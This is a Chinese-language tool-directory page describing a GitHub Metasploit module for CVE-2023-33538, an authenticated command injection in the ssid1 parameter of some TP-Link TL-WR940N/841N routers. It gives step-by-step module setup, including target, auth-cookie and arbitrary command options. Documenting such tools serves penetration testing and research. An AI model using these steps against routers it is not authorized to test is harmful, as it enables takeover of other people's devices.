Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-33538-msf — CVE-2023-33538 - TP-Link 命令注入 Ruby 模块 for Metasploit Framework | Kitploit
工具/GitHubGitHub/mrowkoob/cve-2023-33538-msf
漏洞利用框架漏洞分析Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHubmrowkoob/cve-2023-33538-msf

CVE-2023-33538-msf

CVE-2023-33538 - TP-Link 命令注入 Ruby 模块 for Metasploit Framework

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-33538 – TP-Link TL-WR940N/841N 命令注入(Metasploit 模块)

这个 Metasploit 辅助模块 针对 TP-Link TL-WR940N V2/V4 和 TL-WR841N V8/V10 路由器中一个已认证的 命令注入漏洞。
问题出在 WlanNetworkRpm.htm 中使用的易受攻击的 ssid1 参数,该参数允许注入任意 shell 命令。

如果成功,攻击者可以在设备上执行任意命令。

关于 CVE 的更多信息:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538


如何运行该模块?

  1. 将 .rb 文件复制到你的 Metasploit 模块文件夹,例如:
root@kitploit:~
cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
  1. 启动 Metasploit 控制台:
root@kitploit:~
msfconsole
  1. 搜索并使用模块:
root@kitploit:~
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
  1. 设置必要选项:
root@kitploit:~
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run

该模块不执行身份认证。你需要手动从成功登录路由器 Web 界面的过程中提取 Authorization cookie 和会话前缀。


参考

  • https://nvd.nist.gov/vuln/detail/CVE-2023-33538
  • https://web.archive.org/web/20230609111043/https://github.com/a101e-IoTvul/iotvul/blob/main/tp-link/3/TL-WR940N_TL-WR841N_userRpm_WlanNetworkRpm_Command_Injection.md

免责声明

该模块仅用于教育目的。
请勿将此代码用于你不拥有或未经明确许可测试的设备或基础设施。


问题

如果你发现 bug 或有改进想法——欢迎提交 issue 或留言评论。

下载工具